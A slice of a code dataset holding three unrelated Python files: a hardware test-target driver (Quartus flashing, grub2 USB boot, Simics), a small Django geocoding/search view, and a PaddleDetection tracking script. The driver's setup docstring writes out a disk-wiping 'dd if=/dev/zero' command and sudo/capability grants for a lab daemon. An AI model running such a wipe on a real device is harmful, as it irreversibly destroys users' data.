image_type.startswith(\"kernel-\"):\n raise RuntimeError(\n \"Unknown image type '%s' (valid: kernel-{%s})\"\n % (image_type, \",\".join(self.tags['bsps'].keys())))\n self._power_cycle_do()\n # This code snippet lifted from Zephyr's\n # scripts/support/quartus-flash.py -- thx\n # Minimum changes to place files in directories and wipe them\n # upon context exit, match local style .\n # def _flash_kernel(device_id, input_sof, kernel_hex):\n self.log.info(\"Flashing %s:%s\" % (image_type, image_name))\n with tempfile.NamedTemporaryFile(dir = self.state_dir,\n suffix = \".pof\") as output_pof, \\\n tempfile.NamedTemporaryFile(dir = self.state_dir,\n suffix = \".hex\") as kernel_hex, \\\n tempfile.NamedTemporaryFile(dir = self.state_dir,\n suffix = \".cdf\") as temp_cdf:\n # Apparently, the tools get freaked out by our largish\n # file names, so just make it a temp with a short sweet name\n shutil.copyfile(image_name, kernel_hex.name)\n pof_file = self._create_pof(output_pof, self.input_sof, kernel_hex.name)\n dname, fname = os.path.split(pof_file.name)\n t = string.Template(self.quartus_pgm_template)\n cdf = t.substitute(POF_DIR = dname, POF_FILE = fname)\n temp_cdf.write(cdf)\n temp_cdf.flush()\n try:\n output = subprocess.check_output([\n os.path.join(self.quartus_path, \"quartus_pgm\"),\n \"--quiet\",\n \"-c\", self.device_id,\n temp_cdf.name\n ])\n except subprocess.CalledProcessError as cpe:\n raise RuntimeError(\"Failed to flash image: %s\"\n % cpe.output.decode(\"UTF-8\"))\n self.log.info(\"Flashed %s:%s; output:\\n%s\"\n % (image_type, image_name, output))\n self._power_off_do()\n self.log.info(\"flashing succeeded\")\n\n\nclass grub2elf(tt_serial, ttbl.test_target_images_mixin):\n \"\"\"Boot anything that can take an ELF image with grub2\n\n **Overview**\n\n A platform that can EFI boot off a multiplexed boot USB drive;\n this drive:\n\n - when connected to the target, acts as boot drive which boots\n into grub2 which multiboots into whatever ELF binary we gave it\n\n - when connected to the server, we partition, format, install\n grub2 and the ELF kernel to be booted.\n\n An eight-port USBRLY8 relay bank acting as a USB switcher, each\n relay switching one of the four USB lines from target to server,\n using :class:`ttbl.usbrly08b.plugger`:\n\n - the USB-A female cable is connected to the C relay terminals\n\n - the USB-A male cable for the server is connected to the NC relay\n terminals\n\n - the USB-A male cable for the client is connected to the NO relay\n terminal\n\n - a target that EFI/boots and can boot off a USB drive\n\n Limitations:\n\n - kinda hardcoded x86-64, shall be easy to fix\n\n **Methodology**\n\n The power rail for the target ensures that when the target is\n powered on, the USB boot drive is connected to the target by the\n USB multiplexor. When the target is off, the USB boot drive is\n connected to the server.\n\n The imaging process in :meth:`image_do_set` will make sure the USB\n drive is connected to the server (by powering off the target) and\n then use the helper script ``/usr/share/tcf/setup-efi-grub2-elf.sh``\n to flash the ELF kernel to the drive (as well, will create the\n grub2 boot structure)--for this we need the drive's USB serial\n number and the ELF file to boot.\n\n Upon boot, the boot drive will be detected and booted by default,\n as the grub configuration is set to just boot that ELF kernel.\n\n For cases where BIOS interaction with the console might be\n necessary, a boot coercer can be implemented in the form of a\n power control implementation that in its `power_on_do()` method\n talks to the serial port to do whatever is needed. See for example\n :class:`conf_00_lib.minnowboard_EFI_boot_grub_pc` which does so\n for Minnowboards.\n\n **Setup**\n\n - the helper script ``/usr/share/tcf/setup-efi-grub2-elf.sh`` is\n used to partition, configure and setup the USB drive--it\n is run with *sudo* (via the sudo configurations script\n :download:`/etc/sudoers.d/ttbd_sudo <../ttbd/ttbd_sudo>`)\n\n - The daemon will require specific capabilities for being able to\n run *sudo* (*CAP_SETGID*, *CAP_SETUID*, *CAP_SYS_ADMIN*,\n *CAP_FOWNER*, *CAP_DAC_OVERRIDE*) setup in\n :download:`/etc/systemd/system/ttbd@.service\n <../ttbd/ttbd@.service>`.\n\n - Ensure the following packages are available in the system:\n\n * parted\n * dosfstools\n * grub2-efi-x64-cdboot and grub2-efi-x64-modules\n * util-linux\n\n - Identify the serial number for the USB drive; plug it to a\n machine and issue::\n\n $ lsblk -o \"NAME,SERIAL,VENDOR,MODEL\"\n NAME SERIAL VENDOR MODEL\n sdb AOJROZB8 JetFlash Transcend 8GB\n sdj 76508A8E JetFlash Transcend 8GB\n ...\n\n (for this example, ours is *76508A8E*, `/dev/sdj`)\n\n blank the USB drive (**NOTE!!!** This will destroy the drive's\n contents)::\n\n $ dd if=/dev/zero of=/dev/sdj\n\n - Create a power controller\n\n - Setup the target's BIOS to boot by default off the USB drive\n\n See :func:`conf_00_lib.minnowboard_add` for an example instantiation.\n\n \"\"\"\n def __init__(self, _id,\n power_controller,\n usb_drive_serial,\n usbrly08b_serial, usbrly08b_bank,\n serial_port,\n boot_coercer = None):\n power_control = [\n # Ensure the USB dongle is / has been connected to the server\n ttbl.pc.delay_til_usb_device(usb_drive_serial,\n when_powering_on = False,\n want_connected = True),\n ttbl.usbrly08b.plugger(usbrly08b_serial, usbrly08b_bank),\n # let the dongle power up, otherwise it won't be seen\n ttbl.pc.delay(2),\n ttbl.pc.delay_til_usb_device(usb_drive_serial,\n when_powering_on = True,\n want_connected = False),\n ttbl.pc.delay(2),\t\t# let USB dongle settle to the target\n ttbl.cm_serial.pc(),\t\t# Let it open and close ports\n power_controller,\n ttbl.pc.delay(2),\t\t# board powers up...\n ]\n # A boot coercer is a PCI that talks to the target to get it to\n # boot right, so it only implements power_on_do() to do that,\n # power_off_do() has only a pass and power_get_do() returns\n # True.\n # This is eg needed if we need to tell the bios to do this, do\n # that -- in the case of Minnowboard, tell the EFI shell to\n # run grub (sometimes).\n if boot_coercer:\n assert isinstance(boot_coercer, ttbl.tt_power_control_impl)\n power_control.append(boot_coercer)\n self.usb_drive_serial = usb_drive_serial\n tt_serial.__init__(\n self,\n _id,\n power_control,\n serial_ports = [\n \"pc\",\n { \"port\": serial_port, \"baudrate\": 115200 }\n ])\n ttbl.test_target_images_mixin.__init__(self)\n\n image_types_valid = (\"kernel\", \"kernel-x86\")\n\n def image_do_set(self, image_type, image_name):\n if image_type not in self.image_types_valid:\n raise self.unsupported_image_e(\n \"%s: image type not supported (valid: %s)\"\n % (image_type, \", \".join(self.image_types_valid)))\n # power off the board to flash, this will redirect the USB\n # drive to be connected to the server\n self.power_off(self.owner_get())\n\n # We don't verify image_name is an ELF file so that we can\n # also use this to flash other stuff and it's up to the Grub\n # bootloader to interpret it.\n\n # We need an image with a bootloader, we use grub2 and we\n # share the setup-efi-grub2-elf.sh implementation from\n # simics and others\n cmd_path = commonl.ttbd_locate_helper(\"setup-efi-grub2-elf.sh\",\n log = self.log)\n # Yeah, sudo ... it kinda sucks, but it is the best way to\n # isolate it -- could run from the daemon, then it'd have too\n # many permissions--nope. file ./ttbd.sudo contains the config\n # to put in /etc/sudoers.d for this to work.\n cmdline = [ \"sudo\", \"-n\", cmd_path, self.usb_drive_serial,\n image_name, \"x86_64\" ]\n try:\n self.log.debug(\"flashing with command '%s'\" % \" \".join(cmdline))\n output = subprocess.check_output(cmdline,\n stderr = subprocess.STDOUT)\n except subprocess.CalledProcessError as cpe:\n msg = \"flashing with command '%s' failed: %s\" \\\n % (\" \".join(cpe.cmd), cpe.output)\n self.log.error(msg)\n raise RuntimeError(msg)\n self.log.debug(\"flashed with command '%s': %s\"\n % (\" \".join(cmdline), output))\n\n def images_do_set(self, images):\n # No need to set multiple images at the same time\n pass\n\nclass simics(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.tt_power_control_impl,\n ttbl.test_target_images_mixin,\n ttbl.test_target_console_mixin):\n \"\"\"\n Driver for a target based on Simics simulation of a platform\n\n Currently this driver is quite basic and supports only the image\n and console management interfaces:\n\n - images are only supported as an ELF file that is booted by\n *grub2* when simics boots from a hard disk image generated on\n the fly.\n\n - the only supported console is a serial output (no input)\n\n **System setup**\n\n 1. In a configuration file (e.g. */etc/environment*), set the base\n package for Simics::\n\n SIMICS_BASE_PACKAGE=/opt/simics/5.0/simics-5.0.136\n\n note that all the packages and extensions installed in there\n must have been registered with the global Simics configuration,\n as it will execute under the user as which the daemon is run\n (usually *ttbd*).\n\n Note that the installation of Simics and any extra packages\n needed can be done automagically with::\n\n $ destdir=/opt/simics/5.0\n $ mkdir -p $destdir\n # --batch: no questions asked, just proceed\n # -a: auto select packages and register them\n $ ./install-simics.pl --batch -a --prefix $destdir \\\\\n package-1000-5.0.136-linux64.tar.gz.aes KEY-1000 \\\\\n package-1001-5.0.54-linux64.tar.gz.aes KEY-1001 \\\\\n package-1010-5.0.59-linux64.tar.gz.aes KEY-1010 \\\\\n package-1012-5.0.24-linux64.tar.gz.aes KEY-1012 \\\\\n package-2018-5.0.31-linux64.tar.gz.aes KEY-2018 \\\\\n package-2075-5.0.50-linux64.tar.gz.aes KEY-2075\n\n \"\"\"\n class error_e(Exception):\t\t# pylint: disable = missing-docstring\n pass\n\n class simics_start_e(error_e):\t# pylint: disable = missing-docstring\n pass\n\n #: location of the base Simics installation in the file system; by\n #: default this taken from the *SIMICS_BASE_PACKAGE* environment\n #: variable, if it exists; it can also be set in a configuration\n #: file as:\n #:\n #: >>> ttbl.tt.simics.base_package = \"/some/path/simics-5.0.136\"\n base_package = os.environ.get('SIMICS_BASE_PACKAGE', None)\n\n def __init__(self, _id, simics_cmds, _tags = None,\n image_size_mb = 100):\n assert isinstance(_id, basestring)\n assert isinstance(simics_cmds, basestring)\n assert image_size_mb > 0\n if self.base_package == None:\n raise RuntimeError(\n \"Simics not yet configured, either define environment \"\n \"variable SIMICS_BASE_PACKAGE or configuration \"\n \"ttbl.tt.simics.base_package\")\n ttbl.test_target.__init__(self, _id, _tags = _tags)\n ttbl.tt_power_control_mixin.__init__(self)\n ttbl.tt_power_control_impl.__init__(self)\n ttbl.test_target_images_mixin.__init__(self)\n ttbl.test_target_console_mixin.__init__(self)\n self.simics_path = os.path.join(self.base_package, \"bin/simics\")\n self.simics_check_path = os.path.join(self.base_package,\n \"linux64/bin/simics-common\")\n self.simics_cmds = simics_cmds\n #: Variables that can be expanded in the Simics configuration\n #: script passed as an argument\n self.simics_vars = dict(\n simics_workspace = os.path.join(self.state_dir,\n \"simics.workspace\"),\n simics_pidfile = os.path.join(self.state_dir, \"simics.pid\"),\n simics_console = os.path.join(self.state_dir,\n \"simics-console.read\"),\n simics_hd0 = os.path.join(self.state_dir, \"simics-hd0.img\"),\n simics_hd0_size = image_size_mb,\n )\n self.logfile_name = os.path.join(self.state_dir, \"simics.log\")\n self.telnet = None\n # FIXME: verify the BSP is kosher? generate command line from it?\n\n image_types_valid = ( \"kernel\", \"kernel-x86\" )\n\n # Image management interface\n def image_do_set(self, image_type, image_name):\n if image_type not in self.image_types_valid:\n raise self.unsupported_image_e(\n \"%s: image type not supported (valid: %s)\"\n % (image_type, \", \".join(self.image_types_valid)))\n # power off the target to flash, so in case simics is running\n # on the image/files, it is stopped and we won't conflict /\n # corrupt anything.\n self.power_off(self.owner_get())\n # Remove old image and create a new one, just writing one byte\n # at the end to create a shallow file.\n commonl.rm_f(self.simics_vars['simics_hd0'])\n with open(self.simics_vars['simics_hd0'], \"w\") as f:\n f.seek(self.simics_vars['simics_hd0_size'] * 1024 * 1024 - 1)\n f.write('0')\n\n # We don't verify image_name is an ELF file so that we can\n # also use this to flash other stuff and it's up to the Grub\n # bootloader to interpret it.\n\n # Simics needs an image with a bootloader, we use grub2 and we\n # share the setup-efi-grub2-elf.sh implementation from\n # grub2elf.\n cmd_path = commonl.ttbd_locate_helper(\"setup-efi-grub2-elf.sh\",\n log = self.log)\n # Yeah, sudo ... it kinda sucks, but it is the best way to\n # isolate it -- could run from the daemon, then it'd have too\n # many permissions--nope. file ./ttbd_sudo contains the config\n # to put in /etc/sudoers.d for this to work. Also note the\n # systemd configuration requires us to have permission to\n # regain certain capabilities.\n cmdline = [ \"sudo\", \"-n\", cmd_path, self.simics_vars['simics_hd0'],\n image_name, \"i386\" ]\n try:\n self.log.debug(\"flashing with '%s'\" % \" \".join(cmdline))\n output = subprocess.check_output(cmdline,\n stderr = subprocess.STDOUT)\n except subprocess.CalledProcessError as cpe:\n msg = \"flashing with command '%s' failed: %s\" \\\n % (\" \".join(cpe.cmd), cpe.output)\n self.log.error(msg)\n raise RuntimeError(msg)\n self.log.debug(\"flashed with command '%s': %s\"\n % (\" \".join(cmdline), output))\n\n\n def images_do_set(self, images):\n pass\n\n # power control interface\n def _simics_launch(self, _target):\n # Note this function will be called again if there is a\n # resource conflict because simics will fail to start and\n # _power_on_do() will detect it.\n cmd_file_name = os.path.join(self.state_dir, \"commands\")\n # clean up old state, but NOT the hd, as we probably created\n # the image with images_do_set() before\n commonl.rm_f(cmd_file_name)\n if self.fsdb.get(\"debug\") != None:\t# if debugging, keep log\n commonl.rm_f(self.logfile_name)\n commonl.rm_f(self.simics_vars['simics_console'])\n commonl.rm_f(self.simics_vars['simics_pidfile'])\n try:\n # Create a fresh Simics workspace\n shutil.rmtree(self.simics_vars['simics_workspace'],\n ignore_errors = True)\n cmdline = [\n os.path.join(self.base_package, \"bin/project-setup\"),\n \"--ignore-existing-files\",\n self.simics_vars['simics_workspace'] ]\n self.log.info(\"creating workspace with %s\" % \" \".join(cmdline))\n subprocess.check_output(cmdline, shell = False,\n stderr = subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n self.log.error(\"failed to create workspace: %s\" % e.output)\n except OSError as e:\n self.log.error(\"failed to create workspace: %s\" % e)\n\n # Write the command script here, in case anything changes in\n # the interpretation of the fields\n simics_console_port = commonl.tcp_port_assigner(1)\n with open(cmd_file_name, \"w\") as cmd_file:\n simics_vars = dict(self.simics_vars)\n simics_vars['simics_console_port'] = simics_console_port\n cmd_file.write(self.simics_cmds % simics_vars)\n cmdline = [ self.simics_path, \"-no-gui\" ]\n if self.fsdb.get(\"debug\"):\t\t# if debugging, be verbose\n cmdline += [ \"-verbose\", \"-verbose\" ]\n cmdline += [\n \"-project\", self.simics_vars['simics_workspace'], cmd_file_name\n ]\n\n # Fire up simics, redirecting all the output (stdout, stderr,\n # traces) to a log file\n logfile = open(self.logfile_name, \"ab\")\n try:\n env = dict(os.environ)\n env['SIMICS_BASE_PACKAGE'] = self.base_package\n self.log.info(\"Starting simics with: %s\" % \" \".join(cmdline))\n p = subprocess.Popen(\n cmdline, shell = False, cwd = self.state_dir, env = env,\n close_fds = True, stdout = logfile, stderr = subprocess.STDOUT)\n except OSError as e:\n raise self.simics_start_e(\"Simics failed to start: %s\" % e)\n with open(self.simics_vars['simics_pidfile'], \"w\") as pidfilef:\n pidfilef.write(\"%d\" % p.pid)\n pid = commonl.process_started(\t\t# Verify it started\n self.simics_vars['simics_pidfile'],\n self.simics_check_path,\n verification_f = os.path.exists,\n verification_f_args = (self.simics_vars['simics_console'],),\n timeout = 20, tag = \"simics\", log = self.log)\n if pid == None:\n raise self.simics_start_e(\"Simics failed to start after 5s\")\n self.fsdb.set('simics_console_port', \"%d\" %\n simics_console_port)\n\n def power_on_do(self, target):\n # try to start qemu, retrying if we have to\n for cnt in range(5):\n try:\n self._simics_launch(target)\n break\n except self.error_e:\n with open(self.logfile_name) as logfile:\n for line in logfile:\n if 'Address already in use' in line:\n # Ops, port we took for the console is\n # taken, try again with another port\n self.log.info(\"%d/5: port conflict, trying again\"\n % cnt)\n self.power_off_do(target)\n continue\n else:\n raise RuntimeError(\"simis: did not start after 5 tries\")\n\n def power_off_do(self, _target):\n self.fsdb.set('simics_console_port', None)\n commonl.process_terminate(self.simics_vars['simics_pidfile'],\n tag = \"simics\",\n path = self.simics_check_path)\n\n def power_get_do(self, _target):\n pid = commonl.process_alive(self.simics_vars['simics_pidfile'],\n self.simics_check_path)\n return pid != None\n\n # Console mixin\n # Any file SOMETHING-console.read describes a console that is available.\n def console_do_list(self):\n consoles = []\n for filename in os.listdir(self.state_dir):\n if filename.endswith(\"-console.read\"):\n console_name = filename[:-len(\"-console.read\")]\n consoles.append(console_name)\n return consoles\n\n def console_do_read(self, console_id = None, offset = 0):\n if console_id == None:\n console_id = 'simics'\n if console_id != 'simics':\n raise RuntimeError(\"console ID '%s' not found\" % console_id)\n # Reading is simple -- simics pipes all the output to a file\n # called simics-console.read\n consolefname = os.path.join(self.state_dir,\n \"%s-console.read\" % console_id)\n if os.path.isfile(consolefname):\n # don't open codecs.open() UTF-8, as that will trip Flask\n # when passing the generator up to serve to the client\n ifd = open(consolefname, \"rb\")\n if offset > 0:\n ifd.seek(offset)\n return ifd\n else:\n return iter(())\n\n def console_do_write(self, _data, _console_id = None):\n _simics_console_port = self.fsdb.get('simics_console_port')\n if _simics_console_port == None:\n raise RuntimeError(\"target is off, cannot write to it\")\n simics_console_port = int(_simics_console_port)\n\n # re-create it for every write -- yeah, overkill, but this\n # runs across multiple servers, so we don't know if it was\n # power cycled and thus the port is still valid/open..\n # FIXME: hack, should cache\n telnet = telnetlib.Telnet('127.0.0.1', simics_console_port)\n\n # KLUDGE, workaround\n # So this C-like loop (because I want it to be clearer\n # than hidden iterator pythonic stuff) it is chunking\n # the data to be sent to the VM's serial console\n # and doing a short sleep in between. Why?\n # Because by observation we've seen data being lost\n # when sending it to the sock that represents the\n # input. Chunking it up and giving it a breather\n # alleviated it.\n chunk_size = 8\n count = 0\n l = len(_data)\n while l > 0:\n if l >= chunk_size:\n chunk_data = _data[count:count + chunk_size]\n else:\n chunk_data = _data[count:count + l]\n # FIXME: I seriously don't have any idea of what am I doing\n # here; this Python2 string decoding/encoding stuff is\n # utterly confusing -- but this is how it works :/\n telnet.write(chunk_data.decode('latin1').encode('utf-8'))\n time.sleep(0.15)\n l -= chunk_size\n count += chunk_size\n"} {"ext": "py", "sha": "1a31104b11cdd902cc971f225584b84aa89cde71", "content": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\ndef warn(*args, **kwargs):\n pass\n\nfrom django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\nfrom django.http import HttpResponse, JsonResponse\nfrom django.db.models import Q\nfrom .models import *\n\ndef search(request):\n try:\n query = request.GET['search']\n query = str(query).lower()\n mydict = {\n \"urls\" : Url.objects.all().filter(Q(link__contains=query) | Q(result__contains=query) | Q(created_at__contains=query) |\n Q(rank__contains=query) | Q(dom__contains=query) | Q(country__contains=query) | Q(state__contains=query) | Q(emails__contains=query) |\n Q(add__contains=query) | Q(org__contains=query) | Q(city__contains=query)\n ).order_by('-created_at')\n }\n return render(request,'list.html',context=mydict)\n except:\n return render(request,'404.html')\n\n\n\n\ndef error_404_view(request, exception):\n return render(request,'404.html')\n\ndef index(request):\n try:\n return render(request, '404.html')\n except:\n return render(request, '404.html')\n\n\n\n\nfrom requests import get\nimport json\nfrom dateutil import parser as dateparser\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef result(request):\n #text=request.GET['nm'].strip()\n #http://127.0.0.1:8000/result?uniqueid=12&nm=hi&phonenumber=12321&time=21%2F12%2F1998+12%3A12%3A12\n #result=\"booked\"\n lat=request.GET['LAT']\n lon=request.GET['LON']\n \n import reverse_geocoder as rg\n\n coordinates = (lat,lon)\n #print (rg.search(coordinates)[0]['name'], rg.search(coordinates)[0]['admin1'])\n mydict = {\n \"query\" : f\"{lat},{lon}\",\n \"city\" : rg.search(coordinates)[0]['name'],\n \"state\" : rg.search(coordinates)[0]['admin1']\n }\n response = JsonResponse(mydict)\n return response \n \n\n\n\n\n\n\n\n"} {"ext": "py", "sha": "1a3110a46fac47e9441195ccd606cb148fac6b9a", "content": "# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport time\nimport yaml\nimport cv2\nimport re\nimport numpy as np\nfrom collections import defaultdict\n\nimport paddle\nfrom paddle.inference import Config\nfrom paddle.inference import create_predictor\n\nfrom picodet_postprocess import PicoDetPostProcess\nfrom utils import argsparser, Timer, get_current_memory_mb, _is_valid_video, video2frames\nfrom det_infer import Detector, DetectorPicoDet, get_test_images, print_arguments, PredictConfig\nfrom det_infer import load_predictor\nfrom benchmark_utils import PaddleInferBenchmark\nfrom visualize import plot_tracking\n\nfrom mot.tracker import DeepSORTTracker\nfrom mot.utils import MOTTimer, write_mot_results, flow_statistic, scale_coords, clip_box, preprocess_reid\n\nfrom mot.mtmct.utils import parse_bias\nfrom mot.mtmct.postprocess import trajectory_fusion, sub_cluster, gen_res, print_mtmct_result\nfrom mot.mtmct.postprocess import get_mtmct_matching_results, save_mtmct_crops, save_mtmct_vis_results\n\n# Global dictionary\nMOT_SUPPORT_MODELS = {'DeepSORT'}\n\n\ndef bench_log(detector, img_list, model_info, batch_size=1, name=None):\n mems = {\n 'cpu_rss_mb': detector.cpu_mem / len(img_list),\n 'gpu_rss_mb': detector.gpu_mem / len(img_list),\n 'gpu_util': detector.gpu_util * 100 / len(img_list)\n }\n perf_info = detector.det_times.report(average=True)\n data_info = {\n 'batch_size': batch_size,\n 'shape': \"dynamic_shape\",\n 'data_num': perf_info['img_num']\n }\n log = PaddleInferBenchmark(detector.config, model_info, data_info,\n perf_info, mems)\n log(name)\n\n\nclass SDE_Detector(Detector):\n \"\"\"\n Detector of SDE methods\n\n Args:\n pred_config (object): config of model, defined by `Config(model_dir)`\n model_dir (str): root path of model.pdiparams, model.pdmodel and infer_cfg.yml\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16)\n batch_size (int): size of per batch in inference, default is 1 in tracking models\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n cpu_threads (int): cpu threads\n enable_mkldnn (bool): whether to open MKLDNN\n \"\"\"\n\n def __init__(self,\n pred_config,\n model_dir,\n device='CPU',\n run_mode='fluid',\n batch_size=1,\n trt_min_shape=1,\n trt_max_shape=1088,\n trt_opt_shape=608,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n super(SDE_Detector, self).__init__(\n pred_config=pred_config,\n model_dir=model_dir,\n device=device,\n run_mode=run_mode,\n batch_size=batch_size,\n trt_min_shape=trt_min_shape,\n trt_max_shape=trt_max_shape,\n trt_opt_shape=trt_opt_shape,\n trt_calib_mode=trt_calib_mode,\n cpu_threads=cpu_threads,\n enable_mkldnn=enable_mkldnn)\n assert batch_size == 1, \"The detector of tracking models only supports batch_size=1 now\"\n self.pred_config = pred_config\n\n def postprocess(self,\n boxes,\n ori_image_shape,\n threshold,\n inputs,\n scaled=False):\n over_thres_idx = np.nonzero(boxes[:, 1:2] >= threshold)[0]\n if len(over_thres_idx) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n return pred_dets, pred_xyxys\n else:\n boxes = boxes[over_thres_idx]\n\n if not scaled:\n # scaled means whether the coords after detector outputs\n # have been scaled back to the original image, set True \n # in general detector, set False in JDE YOLOv3.\n input_shape = inputs['image'].shape[2:]\n im_shape = inputs['im_shape'][0]\n scale_factor = inputs['scale_factor'][0]\n pred_bboxes = scale_coords(boxes[:, 2:], input_shape, im_shape,\n scale_factor)\n else:\n pred_bboxes = boxes[:, 2:]\n\n pred_xyxys, keep_idx = clip_box(pred_bboxes, ori_image_shape)\n\n if len(keep_idx[0]) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n return pred_dets, pred_xyxys\n\n pred_scores = boxes[:, 1:2][keep_idx[0]]\n pred_cls_ids = boxes[:, 0:1][keep_idx[0]]\n pred_tlwhs = np.concatenate(\n (pred_xyxys[:, 0:2], pred_xyxys[:, 2:4] - pred_xyxys[:, 0:2] + 1),\n axis=1)\n\n pred_dets = np.concatenate(\n (pred_tlwhs, pred_scores, pred_cls_ids), axis=1)\n\n return pred_dets, pred_xyxys\n\n def predict(self,\n image_path,\n ori_image_shape,\n threshold=0.5,\n scaled=False,\n repeats=1,\n add_timer=True):\n '''\n Args:\n image_path (list[str]): path of images, only support one image path\n (batch_size=1) in tracking model\n ori_image_shape (list[int]: original image shape\n threshold (float): threshold of predicted box' score\n scaled (bool): whether the coords after detector outputs are scaled,\n default False in jde yolov3, set True in general detector.\n repeats (int): repeat number for prediction\n add_timer (bool): whether add timer during prediction\n \n Returns:\n pred_dets (np.ndarray, [N, 6]): 'x,y,w,h,score,cls_id'\n pred_xyxys (np.ndarray, [N, 4]): 'x1,y1,x2,y2'\n '''\n # preprocess\n if add_timer:\n self.det_times.preprocess_time_s.start()\n inputs = self.preprocess(image_path)\n\n input_names = self.predictor.get_input_names()\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n if add_timer:\n self.det_times.preprocess_time_s.end()\n self.det_times.inference_time_s.start()\n\n # model prediction\n for i in range(repeats):\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n boxes_tensor = self.predictor.get_output_handle(output_names[0])\n boxes = boxes_tensor.copy_to_cpu()\n if add_timer:\n self.det_times.inference_time_s.end(repeats=repeats)\n self.det_times.postprocess_time_s.start()\n\n # postprocess\n if len(boxes) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n else:\n pred_dets, pred_xyxys = self.postprocess(\n boxes, ori_image_shape, threshold, inputs, scaled=scaled)\n if add_timer:\n self.det_times.postprocess_time_s.end()\n self.det_times.img_num += 1\n return pred_dets, pred_xyxys\n\n\nclass SDE_DetectorPicoDet(DetectorPicoDet):\n \"\"\"\n PicoDet of SDE methods, the postprocess of PicoDet has not been exported as\n other detectors, so do postprocess here.\n\n Args:\n pred_config (object): config of model, defined by `Config(model_dir)`\n model_dir (str): root path of model.pdiparams, model.pdmodel and infer_cfg.yml\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16)\n batch_size (int): size of per batch in inference, default is 1 in tracking models\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n cpu_threads (int): cpu threads\n enable_mkldnn (bool): whether to open MKLDNN\n \"\"\"\n\n def __init__(self,\n pred_config,\n model_dir,\n device='CPU',\n run_mode='fluid',\n batch_size=1,\n trt_min_shape=1,\n trt_max_shape=1088,\n trt_opt_shape=608,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n super(SDE_DetectorPicoDet, self).__init__(\n pred_config=pred_config,\n model_dir=model_dir,\n device=device,\n run_mode=run_mode,\n batch_size=batch_size,\n trt_min_shape=trt_min_shape,\n trt_max_shape=trt_max_shape,\n trt_opt_shape=trt_opt_shape,\n trt_calib_mode=trt_calib_mode,\n cpu_threads=cpu_threads,\n enable_mkldnn=enable_mkldnn)\n assert batch_size == 1, \"The detector of tracking models only supports batch_size=1 now\"\n self.pred_config = pred_config\n\n def postprocess(self, boxes, ori_image_shape, threshold):\n over_thres_idx = np.nonzero(boxes[:, 1:2] >= threshold)[0]\n if len(over_thres_idx) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n return pred_dets, pred_xyxys\n else:\n boxes = boxes[over_thres_idx]\n\n pred_bboxes = boxes[:, 2:]\n\n pred_xyxys, keep_idx = clip_box(pred_bboxes, ori_image_shape)\n if len(keep_idx[0]) == 0:\n pred_dets = np.zeros((1, 6), dtype=np.float32)\n pred_xyxys = np.zeros((1, 4), dtype=np.float32)\n return pred_dets, pred_xyxys\n\n pred_scores = boxes[:, 1:2][keep_idx[0]]\n pred_cls_ids = boxes[:, 0:1][keep_idx[0]]\n pred_tlwhs = np.concatenate(\n (pred_xyxys[:, 0:2], pred_xyxys[:, 2:4] - pred_xyxys[:, 0:2] + 1),\n axis=1)\n\n pred_dets = np.concatenate(\n (pred_tlwhs, pred_scores, pred_cls_ids), axis=1)\n\n return pred_dets, pred_xyxys\n\n def predict(self,\n image_path,\n ori_image_shape,\n threshold=0.5,\n scaled=False,\n repeats=1,\n add_timer=True):\n '''\n Args:\n image_path (list[str]): path of images, only support one image path\n (batch_size=1) in tracking model\n ori_image_shape (list[int]: original image shape\n threshold (float): threshold of predicted box' score\n scaled (bool): whether the coords after detector outputs are scaled,\n default False in jde yolov3, set True in general detector.\n repeats (int): repeat number for prediction\n add_timer (bool): whether add timer during prediction\n Returns:\n pred_dets (np.ndarray, [N, 6]): 'x,y,w,h,score,cls_id'\n pred_xyxys (np.ndarray, [N, 4]): 'x1,y1,x2,y2'\n '''\n # preprocess\n if add_timer:\n self.det_times.preprocess_time_s.start()\n inputs = self.preprocess(image_path)\n\n input_names = self.predictor.get_input_names()\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n if add_timer:\n self.det_times.preprocess_time_s.end()\n self.det_times.inference_time_s.start()\n\n # model prediction\n for i in range(repeats):\n self.predictor.run()\n np_score_list.clear()\n np_boxes_list.clear()\n output_names = self.predictor.get_output_names()\n num_outs = int(len(output_names) / 2)\n for out_idx in range(num_outs):\n 